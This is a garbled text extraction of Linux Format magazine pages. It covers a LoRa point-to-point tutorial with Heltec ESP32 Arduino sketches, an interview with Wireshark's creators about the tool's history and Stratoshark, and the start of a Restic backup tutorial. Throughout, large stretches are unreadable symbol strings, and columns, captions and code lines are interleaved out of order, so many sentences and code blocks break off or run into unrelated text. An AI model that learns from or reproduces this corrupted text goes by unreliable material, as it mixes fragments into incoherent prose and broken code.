experience get started without having to get involved with any fortunately, can be purchased (around US$20) from
ǫȥࢳˁǫɭơȍơɽɽ surface mount soldering. various retailers. More information about it is at
networking save https://heltec.org/project/wifi-lora-32-v3/.
you both pain Espressif + Module = Win! Furthermore, a total of three variants exist. The
and effort. Hardware developers working on wireless systems following steps take place on the third version of the
show a Pavlovian reaction towards Espressif’s board, which can be easily identified as it also has a
ecosystem. However, Espressif does not currently USB C port for communication. Previous models made
-/,3&!",v -)"*& /, ,+1/,))"/o +01"!n1%&/!v do with micro USB and had a slower ESP32 core.
party vendors offer development boards that combine Soldering in the pins is not particularly difficult.
+;:n!!&1&,+)-"/&-%"/)0+!, %&-o%" %"/"/,2+!1%" ,++" 1,/&0"01)"#1
,/!20"!&+1%"#,)),4&+$01"-0&01%"& &, untouched, as the risk of heat damage to the
32(V3) developed by Chinese brand Heltec – it, FPC connector is real. Finally, the video found at

LORA LORA QUESTIONS

Connecting remote IoT sensors to a ,n+/"3&1&,+,#,+$+$"n works purely in the licence-free band,
base station does not require a high turned out to be the victor of the meaning no costs are incurred for point-
speed – quite the contrary; low speed 4&/")"00-/,1, ,)4/0o+$"!6 to-point links.
rates are perfectly acceptable if they ,*-+6"*1" %n,&04&/")"00 %&)"1%"!"1&)0,#1%"
lead to lower power consumption and technology for sensor networking. A implementation of the air interface
higher range. This is the raison d’être of 0-""!,#8o;(&1š01,=8(&1š0*("0 /""6,+!1%"0 ,-",#1%&0/1& )"n
1" %+,),$6x1%"1"/*01+!0 the average modem appear fast – on 1%"),4-/& "+!"0",#&+1"$/1&,+
for low power wide area network. 1%",1%"/%+!n1%"*&+&*)-,4"/ mean that every maker should know
0 +" /"1"!6 //&"/0n ,+02*-1&,+*"+01%1 ,&+v "))v 1%"0& 0,#,o 2/1%"/*,/"n
21+,+v "))2)/0-"/*&16,21, powered sensors have a realistic chance affordable development boards lead
become their own network carrier. of serious battery life. Also, the system to a flat learning curve.

48 LXF326 April 2025 www.linuxformat.com

 Long-range wireless TUTORIALS

https://bit.ly/lxf326solder provides LoRa devices can

hints for those not particularly transmit over
wide ranges.
experienced with soldering. Here you can
%&)"1%";:v; see live results
microcontroller on our development recorded from
board can be targeted with ESP_IDF, our man in
Budapest.
we will play it simple and use Arduino
Credit: Map
IDE. In particular, the following steps kindly generated
will take place using version 2.3.2 of by www.
the development environment. The cartotype.com/
development host is an Ubuntu 20.04 the-maps-app
4,/(011&,+q!2"1,1%""5 "))"+1
hardware abstraction properties of
1%"Arduino IDE, the steps can also be
performed using workstations running
&+!,40,/ o
After installing pending updates,
0m
click the File > Preferences option to 20
open the preferences of the Arduino
IDE. Use the Additional Boards
+$"/0#&")!1,!!!!&1&,+)
package repositories to the package
manager – the board-support modules
/".2&/"!/"0&!"2+!"/1%"
https://bit.ly/lxf326esp.
After that, open the Board Manager
and look for the string heltec esp32 to
reveal the Heltec ESP32 series dev-boards library. plan allocating frequencies differs from country to
,4+),!&104"))x01%"1&*",#4/&1&+$n3"/0&,+ ,2+1/6x&+1%" 0",#,n1%"#/".2"+ &"020"!
3.0.2 is current. differ between Europe and the USA, there is of course Certifying
#1"/1%1n,-"+1%"&//6+$"/1+!),,( a full guide https://bit.ly/lxf326bands. electronics
for the string heltec esp32. This time, the library Heltec "51n )& (1%"-),!211,+1,01/1 ,*-&)&+$o # for sale is
;:"3v,/!0&0+""!"!x11%"*,*"+1n3"/0&,+ you’re running this task for the first time, it takes a a relatively
2.1.2 is current. Be careful to grab the official version by ),+$1&*"x))1%")&//6 ,!"+""!01," ,*-&)"! complex topic,
Heltec Automation – the repository contains third- &+!!&1&,+1,1%"20"/ ,!"&+1%"0("1 %o which is not
covered by
party libraries that are not useful for this article. In most cases, both compilation and program
this article. In
%"+!,+"n1%""5*-)"00")" 1&,+#,2+!2+!"/ delivery work flawlessly, displaying geometric forms practice, getting
&)"–5*-)"0– ")1" ;:"3v,/!0-/,3&!"0 and textual information on the display. Manual legal advice is
3/&"16,#!!&1&,+)!"*,+01/1&,+,'" 10o ,/ &+1"/3"+1&,+&00,*"1&*"0+""!"!3&1%" +! recommended
0&*-)"0*,("1"01n0")" 1 ")1" ;:"3v,/!0– 211,+0o +-/1& 2)/n%,)!1%" 211,+4%&)" before the mass
–&*-)""*,1,),!1%"0("1 %&++"4 0%,/1)6-20%&+$+!/")"0&+$1%"211,+o%&0 deployment of
Arduino IDE window. button sequence ensures that the ESP32 wireless wireless systems
"51n ,++" 11%"!"3"),-*"+1,/!1,1%" module is programmable via its bootloader. in Europe.
4,/(011&,+20&+$ )"o,+,1"0%, ("!
&#1%"0 /""+&**"!&1")601/10!&0-)6&+$&+#,/*1&,+ LoRa vs LoRaWAN
x ")1" -/,3&!"0,v0"!,21v,#v,5 %"+!")&+$4&1%,v0"!-/,!2 10n1%"1"/*0
experience, which we won’t actually be using in the ,+!,/",#1"+20"!&+1"/ %+$")6o
following steps. This is incorrect – an official distinction between the
-"+0" ,+!1"/*&+)4&+!,4+! %" ( two terms can be found at https://resources.lora-
1%"("/+")),$4&1%dmesg – if the USB-to-serial alliance.org/home/lora-and-lorawan. In practice, the
converter found on the development board has !&01&+ 1&,+"14""++,/*)+!&0,#1"+20"!
connected to the workstation successfully, a line 1,!&01&+$2&0%14,!&##"/"+1,-"/1&+$*,!"0,#1%"
similar to [ 4350.439078] usb 1-1.4: cp210x converter wireless transmitter.
now attached to ttyUSB0 shows up. +,*,!"n1%"&+!&3&!2)*,!2)"0 ,**2+& 1"
If that message is visible, click Tools and open the &+:#0%&,+o +,*,!"n "+1/)$1"46
board selector to select the target board called Heltec acts as an intermediary. This central gateway can use
;:"/&"0"3v,/!0–& &,;:ƒ;„o"51n other networking technologies to expand the range.
check that the port selected matches the one shown in ,*-+&"002 %0%"%&+$0"14,/( 10
dmesg. The rest of the options can be kept as is, but ,+"14,/(-/,3&!"/&+#0%&,+0&*&)/1,4%1
look at the menu (see screenshot over page) – it can &0!,+"&+1%"&$#,54,/)!x1%"&/20"n%,4"3"/n&0+,1
"3&1)06,20""(1,&+1"/+1&,+)&0"6,2/0,)21&,+o within the scope of this article. From this introduction,
&("*,01+"14,/(0n,/"0&!"0&+ it is obvious that in the following steps – we purchased
unlicensed bands. Any product that limits its two of these development boards – we are using the
transmission power to the specified limits can transmit P2P mode of communication.
without much additional certification. Sadly, the band The next act involves loading the Heltec ESP32

www.techradar.com/pro/linux April 2025 LXF326 49

 TUTORIALS Long-range wireless

takes place via the radio,'" 1n4%,0"&+&1&)&01&,+

THE LORA CALCULATOR &0-"/#,/*"!00""+&+1%"#,)),4&+$ ,!"p
Radio.Init( &RadioEvents );
Many, if not most, of the parameters provided as #define constants Radio.SetChannel( RF_FREQUENCY );
in the example program’s header affect how the wireless transmitter Radio.SetTxConfig( MODEM_LORA, TX_OUTPUT_
interacts with its surroundings. POWER, 0, LORA_BANDWIDTH . . .
A convenient way to experiment with the various settings is the The worker consists of an endless loop. Its first act
"*1" ,) 2)1,/n4%& % +"#,2+!1www.semtech.com/ &+3,)3"0 %" (&+$&#1%",1/+0*&11"/&0/"!6o #0,n
design-support/lora-calculator. Select the wireless modem chip and a packet is constructed inside the txpacket variable.
"+1"/1%"3/&,200"11&+$06,2-)+1,20"o+" )& (,+1%"2*&1 Afterward, radio.send is invoked to transmit the
211,+n+!1%"0601"*&+#,/*06,2,21 -"/#,/*+ "+! package via the wireless link:
various other communication-related parameters. void loop() {
%" ) 2)1,/ +"/2+,+&+25n&+!,40+! o + if(lora_idle == true) {
practice, the program works best in Google Chrome. %"+4"1/&"! delay(1000);
to load it in Firefox,0")" 1&+$1%", %&-&+1%""3& ",5!&!+,1 txNumber += 0.01;
lead to anything happening on the rest of the screen. sprintf(txpacket,”Hello world
number %0.2f”,txNumber);
Serial.printf(“\r\nsending packet
"3v,/!0–,0& –,"+!"/0("1 %o 1 \”%s\” , length %d\r\n”,txpacket, strlen(txpacket));
realises a simple broadcast transmission using Radio.Send( (uint8_t *)txpacket,
Attempting 1%",-/,1, ,)o%"+),!"!,+1,,+",#,2/ strlen(txpacket) );
to compile evaluation boards, the PCB pollutes the airwaves with lora_idle = false;
Heltec-provided packages containing an ever-increasing number. }
sketches can Furthermore, do not be perplexed if the board’s Radio.IrqProcess( );
fail, resulting screen stays dark – for reasons of simplicity, the }
in errors sender program does not interact with the graphical In this bit of code, two unique aspects deserve
pointing to files subsystem of the evaluation board. attention. Firstly, the variable txpacket is but a classic
contained in
The header of the file starts with the declaration of char field declared in the header as per the following:
the ESP_IDF
environment.
about a dozen constants related to the behaviour of #define BUFFER_SIZE 30
This is usually the wireless radio. For our first experiments, they
caused by an +"1("+01%"601+!o%"#&/01&+1"/"01&+$ char txpacket[BUFFER_SIZE];
erroneous ")"*"+1,#1%" ,!"&01%"01/2 12/"011&  char rxpacket[BUFFER_SIZE];
target setting RadioEvents_t RadioEvents. It is a structure The maximum package size, incidentally, is an
in Arduino IDE ,+1&+&+$3/&,20#2+ 1&,+-,&+1"/020"!1,/"$&01"/ interesting question – more information about it can
and can be easily 1%"*"00$"%+!)"/01%",01 (4&)) ))!2/&+$ "#,2+!1https://bit.ly/lxf326answer.
remedied by program execution. Secondly, the periodical invocation of the method
ensuring that Actual program initialisation takes place in the setup Radio.IrqProcess( ) is important. It ensures that the
the Heltec board
method and initially invokes setup methods and radio driver gets compute time for housekeeping
is selected as the
target platform.
prepares the radio event struct with pointers to the 10(0x,*&11&+$1,&+3,("&1/"$2)/)64&)) 20"))
event handlers required for the application: kinds of problems in the transmitter and must be
void setup() { 3,&!"!1)) ,010o
Serial.begin(115200); &+))6n"3"+1%+!)"/0/"+""!"!o%"&/*&+',&0
Mcu.begin(HELTEC_BOARD,SLOW_CLK_TPYE); to emit status messages and call the radio hibernation
LoRa radios txNumber=0; method if a timeout occurs during transmission:
support a
wide array RadioEvents.TxDone = OnTxDone; void OnTxDone( void ) {
of frequency RadioEvents.TxTimeout = OnTxTimeout; Serial.println(“TX done......”);
bands. The actual interaction with the wireless module lora_idle = true;
}

void OnTxTimeout( void ) {

Radio.Sleep( );
Serial.println(“TX Timeout......”);
lora_idle = true;
}
&1%1%&0,21,#1%"46n1%"
software can be sent to the evaluation
board. In the serial monitor, output
similar to the one shown in the
screenshot (opposite) will be visible.
For convenience reasons,
connecting the evaluation board to a
power bank or a second workstation
&0/" ,**"+!"!o 3&+$14,/!2&+,
boards attached to the same
4,/(011&,+ +6&")!4"&/!  

50 LXF326 April 2025 www.linuxformat.com

 Long-range wireless TUTORIALS

interactions, especially if the developer operating the

machine is tired and mucks up the board selection.

Finalising the connection

A second board is required to erect the receiving part
of the connection. First, the example code in the sketch
")1" ;:"3v,/!0–,0& –," "&3"/
will be used.
Its structure, by and large, mirrors what is found
&+1%"0"+!"/o +&1&)&01&,++,4n%,4"3"/n20"01%"
method SetRxConfig to configure the receiver part
,#1%"*,!"*#,2+!,+1%""3)21&,+,/!p
RadioEvents.RxDone = OnRxDone;
Radio.Init( &RadioEvents );
Radio.SetChannel( RF_FREQUENCY );
Radio.SetRxConfig( MODEM_LORA, LORA_
BANDWIDTH, LORA_SPREADING_FACTOR,
LORA_CODINGRATE, 0, LORA_
PREAMBLE_LENGTH,
LORA_SYMBOL_TIMEOUT, LORA_FIX_
LENGTH_PAYLOAD_ON, while the receiver board that outputs information is This connector
is responsible
0, true, 0, 0, LORA_IQ_INVERSION_ON, powered from a laptop.
for the LoRa
true ); antenna.
} Range estimation
%"+-"/#,/*&+$1%" 12)/+$""5-"/&*"+10n&1&0
The loop method consists of an endless loop. It paramount to connect an antenna to the connector
invokes the method Radio.Rx to perform a listening shown in the photo (above). Unfortunately, the
cycle. Furthermore, the method Radio.IrqProcess documentation provided by Heltec has some errors in
*201"&+3,("!1,"+02/"1%11%"*,!"*!/&3"/&0 this regard – the small antenna on the PCB is not for
provided with compute time for housekeeping tasks: ,21#,/+,/*)4&/")"00o
void loop() { After that, we went for a little walk, with the
if(lora_idle) { transmitter located in a public place. The map (see
lora_idle = false; page 49) shows the range. Even though the antennas
Serial.println(“into RX mode”); used here were not of the highest quality and were
Radio.Rx(0); mounted ineffectively, it is obvious that the range of
} this wireless technology is far beyond anything
Radio.IrqProcess( );  %&"3)"4&1%&v &,/)2"1,,1%o
} Finally, these results were achieved with a
1/" "&3"!&0%+!)"!&++,1%"/*"1%,!o%" 1/+0*&00&,+-,4"/0"11&+$,#:8n4%&)"1%"/"01
most interesting aspect of this bit of code is the of the parameters were left in the stock state.
method signature – in addition to a char pointer with ,+"14,/(&+$-/,3&!"0 %"-+! %""/#2)46
the payload transmitted, the system also provides to connect systems where large ranges and
The evaluation
integer variables informing about the signal strength comparatively minimal amounts of data transmission
board happily
seen during the transmission: are needed. Thanks to its licence-freeness, no pesky spams its
void OnRxDone( uint8_t *payload, uint16_t size, int16_t carrier needs to be paid. environment.
rssi, int8_t snr ) {
rssi=rssi;
rxSize=size;
memcpy(rxpacket, payload, size );
rxpacket[size]=’\0’;
Radio.Sleep( );
Serial.printf(“\r\nreceived packet \”%s\” with rssi
%d , length %d\r\n”,rxpacket,rssi,rxSize);
lora_idle = true;
}
The rest of this method contains what is to be
expected. Information is output to the serial console of
the Arduino IDE, while an invocation of Radio.Sleep( )
ensures that the radio goes back to low-power sleep.
At this point in time, the second board can be
loaded with its software. After that, it is time to go for
)&11)"4)(x&!"))6n1%"1/+0*&11"/&0)"#1011&,+/6

WE TRAVEL LONG DISTANCES… Subscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux April 2025 LXF326 51

INTERVIEW Wireshark

WIRESHARK
Linux Format talks to Gerald Combs and Loris Degioanni,
about creating Wireshark, the origins of network packet
analysis, and how they want their shark to fly...
ne of the best known open source model), which was this tiny, very inexpensive, minimum

O networking tools in the world, Wireshark

&020"!6% ("/0+!060!*&+0)&("
1, -12/"+!+)60"+"14,/(- ("10
viable computer. That’s what got me hooked. What got
me into networking, I was studying computer science,
took a networking class, and I got hooked from there.
 /,00*6/&!,#0&121&,+0#,/1/,2)"0%,,1&+$+! At the same time as attending classes, I was
),$$&+$o04"}))!&0 ,3"/n&140)0,,+",#1%""/)&"/ working in the computing services department, and
,-"+0,2/ "-/,'" 101, /,001%"1%"+-/& ()6!&3&!" part of my job was to troubleshoot the network. They
"14""+&+25+!&+!,40o"1)(1, "/)!,*0 gave me this network sniffer. It was this device that
+!,/&0"$&,++&,21%,41%"-/,'" 101/1"!+! weighed quite a bit. It cost as much as a luxury car, and
!"3"),-"!n+!1,!&0 ,3"/*,/",211%"&/)1"01 I got to lug it around campus and plug it into different
0601"*4&!"+)60&01,,)nStratoshark. parts of the network and do troubleshooting.
After that I took a job at a small ISP that couldn’t
Linux Format: 1}0+& "1,(+,4-",-)"}0 ($/,2+!n afford a sniffer. It just didn’t have the budget for it
0,4%1406,2/#&/01"5-"/&"+ "4&1% ,*-21"/0+! +!1%1}04%1$3"*"1%"&*-"1201,01/14/&1&+$
%,4!&!6,2$"1&+3,)3"!4&1%&+25+!,-"+0,2/ "l -/,1, ,)+)60"/o11%&0-,&+1n)2 (&)6n1%"
library that lets you do packet capture had been
Gerald Combs: My first experience with a computer? released, so it was easy to plug into that.
I’m gonna be giving away my age here… My parents Suddenly I had this analyser and released it to the
bought me a Timex Sinclair 1000 (the US ZX81 public. I released it as open source because at that

52 LXF326 April 2025 www.linuxformat.com

 Wireshark INTERVIEW

Left: Loris (fourth from left) and Gerald (furthest right) with the but we created two things that were complementary.
ijЭąǏãĨČąǎ
$ǎƒÐÆéĆČÿČäìÐĬǎìĆǎŬŪŪűƧ He created the user interface part and I created the
capture engine for Windows. Wireshark has
time, I had used quite a bit of open source software äĨČŋĆǎijČǎÅÐÆČąÐǎ
one of the world’s
and it just seemed like a really good way to give back LXF: 2011,4%&77 (n ,2)!6,2.2& ()6$,&+1,)&11)" most popular
to the community. As it turned out, this was a great !"1&),214%1- ("10+&##"/0/"+!4%66,21%"+ ĆÐijŋČĨüǎ­Ć­ÿőĬÐĨĬƧ
move, because releasing it as open source let a whole +""!"!1,!,6,2/,4+&*-)"*"+11&,+l
bunch of people contribute, and that’s where we got
our initial developer base. The project also just grew Gerald: As far as the actual network sniffer goes, it
from there. We got a really big boost in our user was a product of its time. They were trying to address
,**2+&164%"+4"!!"!&+02--,/1#,/&+n the same problems we were, but they were developing
which is kind of where Loris joins in. This let us expand it in the ’80s, versus in the late ’90s, so computers
our user base to Windows users, and suddenly we weren’t quite as fast. They had to get as much
have this explosion of users and this large community. powerful hardware as they could into as small and
portable unit as they could. They were called luggables
Loris Degioanni: 6#&/01 ,*-21"/40,**,!,/" +!4"/"02&1 0"0&7"!o6"1%"6%!o
64 – I’m old as well! The computer where I actually So, you were not only lugging around a computer,
learned a lot of stuff and that made me a programmer you were also lugging around two pounds of glass as a
40+*&$o 409<,/9=n+! $,102**"/', display tube. The computers weren’t fast, so you had
as a bartender in Italy. I got enough money saved to to have special hardware for capture, so that included
buy myself either a computer or a scooter. Everybody probably a full-length or half-length capture card with
in Italy at that time wanted a scooter, and all my custom chips on it. So, that made it expensive and
#/&"+!04"/"26&+$1%"*o !" &!"!1,261%" made it heavy, but it did the job at the time.
computer because I was so passionate about that, and It’s just that by the time Loris and I came around,
that’s where I started programming. So, that’s what computers were fast, and you had things like Linux,
got me into operating systems and Linux. where you could go and hack the kernel pretty easily
From the very early days, I remember installing +!!!0,*"1%&+$)&("&n+!+"14,/( /!0
Slackware on my 486 with a tower of floppies, and were cheap.
going and using some of my savings to buy 60MB of I should say that where Loris focused on Windows,
#,/*6<@>n0,  ,2)!/2+&+!,4o1%"/4&0"  40(&+!,#-1%,),$& ))6)&+!1,&1n" 20"6,2
could only run Linux on the command line. Those were asked about Linux experiences. Throughout the ’90s, I
the days when I was at university, I was studying used Unix and Linux; that’s what we used at the ISP,
computer science, really getting into software, and and that’s what I focused on. I just had a minimal
having access to an operating system where you had

NOT TO BE SNIFFED AT
the source code and you could compile the kernel and
012!6%,4&14,/(0+!0,,+o+!1%"/"40 1&3"

“You were not only lugging

development, and being able to contribute was so
powerful and fascinating for me.

around a computer, you were

My story at the university continued with me
getting passionate about networks, a little bit like

also lugging around two pounds

Gerald, and I started working with a computer
networking group at my university in northern Italy.

of glass as a display tube”

0 "/)!%0*"+1&,+"!n+"14,/(+)60"/04"/"
extremely expensive and were not really accessible.
Very often, they were pieces of hardware, like
suitcases, that you had to take around our computer awareness of the Windows world for however that
networks. The professor thought that the best way to worked. It was very fortunate that Loris came along,
learn networks was to observe them and see what’s because, that’s how we got our initial really big boost
happening, see the packets go back and forth. in the user community.
The problem is, we absolutely couldn’t afford to
give a network analyser to all of the students in the LXF: 1%&$%)&$%10%,4&*-,/1+1,-"+0,2/ " +"
lab. And the other problem was that the labs at that 1,-",-)"n4&1%012!"+10)"/+&+$+!!"3"),-&+$
point were running Windows. So, I got the project of (+,4)"!$",#%,41%"0"0601"*04,/(o
hacking with the kernel of Windows to try to make a
package capture library similar to the ones that were Loris: Not only that, but I feel that the library I created
available for Unix and Linux. That was the first serious was one of the first projects, if not the very first, that
software project I did. While doing that, I also ported really bridged the Windows and Unix worlds. One of
tcpdump to Windows. the reasons why I was saying the server under my
I put all this stuff on the little server under the desk was generating so much traffic is that I
!"0(o61%"1&*" $/!21"!n1%1)&11)" ,*-21"/ essentially enabled users to run tools that were
under the desk was doing more traffic than the rest powerful and popular in the Unix world, such as
,#1%"2+&3"/0&16 ,*&+"!o tcpdump, on Windows.
+!1%1}0%,4&+40,/+n+!"00"+1&))6 This was quite radical at that point. The tcpdump
it was the success of two people, me in Italy and port for Windows was called Windump, so a different
Gerald in the United States. We’d never met in person, name. It wasn’t tcpdump for Windows, because the

www.techradar.com/pro/linux April 2025 LXF326 53

INTERVIEW Wireshark

authors of tcpdump didn’t want to tie their name to different industries going, “Hey, I can add this
Windows. In practice, this was quite game changing. automotive protocol” or “I can add this telephony
Across the decades, Microsoft had taken many protocol,” and they all did at the same time.
steps to port the full Linux stack and Unix stack, all the
tools, the shell, all this kind of stuff, to Windows. At Loris: And I just want to remind you that especially in
this point, there was still a clear separation, not only the early days, 1998-1999, there wasn’t GitHub, there
technical, but philosophical and politically. This was wasn’t even Git. There was no social media, so even
essentially the first attempt to unite the two worlds advertising your project was on newsgroups. With
and I think it was positive, not just for technical people development, at least at the beginning, my releases
who could use this tool on Windows, but it was also were ZIP files.
positive as a way to show a path for the Windows It was a different world these very early days, so
community to embrace open source. both from the technical point of view, but also from
For a while, there was a network analyser created the community point of view, we sort of had to figure it
by Microsoft, that just wanted an alternative. But after out. There was a quick evolution during those times,
a while, our open source tool was just better, more not only on how to develop these tools in the open,
widely embraced by the community. Being open 21)0,%,41,1)(1,6,2/20"/0n*+$"6,2/
source enables your colleague or your friend to install communities, and how to reach out to them, and how
it, then it’s easy to share information and to work to receive their contributions and include them all,
together. So, it enables some workflows that not even including licences – all this kind of stuff.
Microsoft could enable on its operating system. It
LXF:,n4%14"/"1%",1%"/*&+&002"06,2%!

OUT IN THE OPEN

1,,3"/ ,*"l

“Being open source enables your

Gerald: I hate to keep beating on Microsoft, but one
,#1%"1%&+$01%1/"))6%")-"!1%"-/,'" 1401%"

colleague or your friend to install it,

fact that in the mid-2000s, Wi-Fi was taking off, but
&140+}1.2&1"/")&)"n+,1+"/)60/")&)"0&1&0

then it’s easy to share information

today. Windows XP had taken off, and we had a lot
,#20"/006&+$n }*1/6&+$1, -12/"4&/")"00,+
Windows XP, and it’s just not working.”
­ĆÌǏijČǎŋČĨüǎijČäÐijéÐĨDž At the time, when you tried to capture wireless
20&+$1%" !/&3"/0n1%"6'2010%211%"!-1,/!,4+n
showed a path that has been followed by other which wasn’t very useful. I got in contact with Loris
projects, other companies, including even Microsoft. and asked if there was a way to solve this problem.
So, it wasn’t orthodox, but it was cool and exciting to "}!#,2+!"! ,*-+6%"/"&+3&0 ))"!
be part of something like that. Technologies, and we decided that there’s a product to
be developed here. Loris offered me a job, and that’s
LXF: ,2}3")*,01+04"/"!,2/+"51.2"01&,+,21 %,4 "+!"!2-*,3&+$#/,*1%"&!4"011,)&#,/+&n
!"3"),-&+$1%" ,**2+&16/,2+!Wireshark. and in that move, we had to change the name of
Ethereal to Wireshark, as my former employer had the
Gerald: One of my challenges throughout the entire trademark for Ethereal. You asked about challenges –
life of the project has been keeping up with the getting licensing down, and trademarks down, and IP
community. I remember when I made the initial down has been one of those challenges.
release, I think I started getting contributions the
+"51!6n+!0,"/)6,+n"0-" &))6n&140(&+!,# LXF: ,2}/" ,!"/0x6,24+11, ,!"n6,2!,+}14+1
struggle to keep up with the community, just because 1,4,//6,21)"$)"0"o
the infrastructure for hosting open source projects
wasn’t there. Loris: It was a challenge, but it was also one of
I had to go build everything myself. I had to go 1%"1"01*"+101,%,4-,4"/#2),-"+0,2/ "+!
26n06n0"/3"/,##"6n21&1401%&0)&11)"2+ communities can be. Essentially, we decided that
workstation, and go find hosting. So, I would trade 4"4+1"!1,!, ,*-+6n+!4"4+1"!1,2&)!
,+02)1&+$4&1% 0/,2+!1,4+n+!0(n+ -21 products around this network analyser, and both
my box here?” and then do that for a few months, and Gerald and I and our business partner had zero
I’d have to go find another friend at another ISP and entrepreneurial expertise or experience raising
park my box there. Nowadays, you have GitHub and venture capital.
GitLab, and it’s very easy to plug all that in and just We decided to go rent an office and start building
$"12-+!/2++&+$4&1%+,-"+0,2/ "-/,'" 1o stuff, and doing consultancy to initially pay the bills,
I think Loris has mentioned in the past that but we didn’t have the ability to acquire the assets of
Wireshark is the perfect open source project, because Ethereal, to be able to start the company around it.
you can have a whole bunch of people developing ,n4"#,/*"!1%"-/,'" 1o"-& ("!+"4+*"n
protocol analysers in parallel. If you know a lot about Wireshark, we created a website, and we told the
network protocols, typically you know how to write community, “We’re still the same people, but we are
 ,!"04"))n1)"01"+,2$%1,4/&1"-/,1, ,) changing name.”
detector for Wireshark. That really helped the project We picked the name; using an animal seemed like a
grow as well. You had all these experts from all these great way to have good logos and good mascots. And

54 LXF326 April 2025 www.linuxformat.com

 Wireshark INTERVIEW

in fact, you know, that proved to be successful. And Far left: Gerald
the name Wireshark is memorable. Everybody who ČąÅĬǎĨЭÿìĬìĆäǎ
éÐǏÌČÐĬĆLJijǎé­ŊÐǎ
has done networks now knows Wireshark. to run Linux on a
}ìĆÆÿ­ìĨǎūŪŪŪƧǎ
LXF: %1&0&11%1Wireshark!,"01%1}0*!"&1
0,02 "00#2)+!4%"/"!,"0&1$,+"51l Left: Loris
Degioanni has
been working
Gerald: Wireshark’s job is to take all the packets that ČĆǎČĥÐĆǎĬČķĨÆÐǎ
go across our network that it can capture and take software
that data and display it in a way that humans can Wireshark
understand. And it does this through a process called ĬìĆÆÐǏūųųųƧ
dissection. It takes every field in each of the packets
and breaks it down and shows you. What’s the name,
what’s the value, what are we looking at here. And display data in specific ways – that make it unique.
that’s why I think it’s so successful, because it lets you We’re applying the Wireshark philosophy, but creating
see all the packets, it lets you filter them, drill down a new tool.
and do all sorts of analysis. That’s why I’m excited
about Stratoshark – the intent is for that to be the Gerald: Along with that, when we were deciding
same type of tool for system calls. whether or not to keep it all in one application or to
split it, you have to keep the user experience in mind
Loris: Gerald and I are launching a new member of the and what their needs are and how their workflow is
Wireshark family. It’s called Stratoshark, and it applies going to be affected. If you’re focused on analysing
essentially the same user interface, the same way to systems, you really want a tool that’s dedicated to that
see discrete information and be able to drill down and not have to wade through the huge Wireshark
+!1(" -12/"0n--)6#&)1"/0+! 201,*&0"1%" feature set, but if you’re focused on systems, you
columns, and all of this kind of stuff. But instead of !,+}14+11,4!"1%/,2$%))1%"1")"-%,+6+!
doing it for network traffic, it does it for system calls networking stuff!
and system information under Linux.
You can install this on your Linux workstation, LXF: %&00,2+!001%,2$%&1}))%3"4&!"--)& 1&,+n
3&/12)* %&+"n-%60& )* %&+"n+!&102--,/10 /"6,2&*&+$&11+6-/1& 2)/!"-),6*"+10l
,+1&+"/0o,2 )& (1%"-12/"211,+n21&+01"!
of capturing the network traffic, you essentially see Loris: The use cases are broad – they can cover
)),#1%" 1&3&161%1&0%--"+&+$&+1%"* %&+"n anything from running these on your local machine
1%""5" 21"!-/, "00"0n)),#1%"#&)"01%1/",-"+ 1,1/,2)"0%,,1n0601"*v)"3")1/,2)"0%,,1&+$+!
+! ),0"!n/"!+!4/&11"+n)),#1%"+"14,/( observability to running these on cloud instances to
conversations, all of the data process communication. see what your containers are doing, figuring out
It’s like an X-ray system that is going to be very application issues or analysing an attack, which is
familiar for people who are using Wireshark, but another powerful thing that you can do, because
it’s a tool for Linux troubleshooting and security

SUPER SHARK SHOOTERS

investigation, and we gave it a new name: Stratoshark.
"}/""5 &1"!#1"/:=6"/01,/&+$+"4#)3,2/
,#Wireshark that is specifically designed and
optimised to see inside the inner workings of a Linux DŽ}ijĨ­ijČĬé­ĨüǎìĬǎ­ǎĆÐŋǎãÿ­ŊČķĨǎ
machine and be able to troubleshoot at the process
and system call level. ČãǏ›ìĨÐĬé­Ĩüǎijé­ijǎìĬǎĬĥÐÆìãìÆ­ÿÿőǎ
LXF: %&0&0+}1"5-+!&+$Wireshark,/0&11&+$"0&!"&1l designed and optimised to see inside
Gerald: It’s a sibling application to Wireshark. It’s its ijéÐǎìĆĆÐĨǎŋČĨüìĆäĬǎČãǎ­ǎPìĆķŐǎą­ÆéìĆÐDž
own application that you can download.
Stratoshark is actually integrated in terms of capture
Loris: When we started working on this, we had a analysing with Falco. This is another project Gerald and
choice: do we just take Wireshark and add this I have been involved with, which is more like a security
functionality inside Wireshark and there’s a single camera for modern, containerised infrastructure.
1,,)1%1 +!,,1%1%&+$0n,/!,4" /"1"0&01"/ Falco can generate signals, detect when there’s an
application that looks a lot like Wireshark, but it’s a attack and create the capture, and Stratoshark can
separate tool that you can download? We chose the analyse the capture. So, there’s actually a broad set
latter because there’s stuff that we wanted to make ,#20" 0"0n0,*"4%& %/"*,/"#,/-"/0,+)20"n
unique and optimised. which I really recommend readers of your magazine
It could have been a bit overwhelming or confusing try, because it’s just fun and interesting to be able
for users who had to switch between two operating 1,1(" -12/",#6,2/0601"*o%"/"}0)0,
modes. So, this looks like Wireshark, has the same professional applications for these in security and
filtering system, the same display system and so on, troubleshooting for modern infrastructures that are
but there are also things in this tool – for example, running in the cloud or in data centres and so on. The
1%"&)&161,1/ (-/, "00"0+!20"/0n1%"&)&161, full spectrum of Linux applicability.

www.techradar.com/pro/linux April 2025 LXF326 55

TUTORIALS
RESTIC
Credit: https://restic.net

Back up data with ease

Neither music nor love will solve your computing problems, but timely
backups just might, feels Shashank Sharma.

good story is one that you can

A 1"))/"-"1"!)6#,/"3"/6,+"}0
*20"*"+1o 1}0"3"+"11"/4%"+
you can tell the same story for different
purposes. For instance, in a decade long ago,
OUR on a computer long since scrapped, he who
shall not be named accidentally dd-ed an
EXPERT &*$"&+1,%/!!&0(-/1&1&,+&+01"!
Shashank ,#!/&3"n/"02)1&+$&+1%" ,*-)"1"
Sharma ),00,#!1o%&0&001,/61%14"}3"1,)!
is a trial lawyer repeatedly when talking about the risks of
in Delhi and an dd, but more importantly, to reiterate the
avid Arch user. benefit of backing up essential files and data.
He’s been %&)"1%"/"}0+2*"/,# (2-
writing about solutions to choose from, most feature a
open source graphical interface that might not be to
software for "3"/6,+"}0)&(&+$o ,/ "+1%20&010n1%"/"}0
ࠁ߿ࢳˊơŔɭɽŔȥƎ #"12/"#2))1"/+1&3"oRestic is a fast and
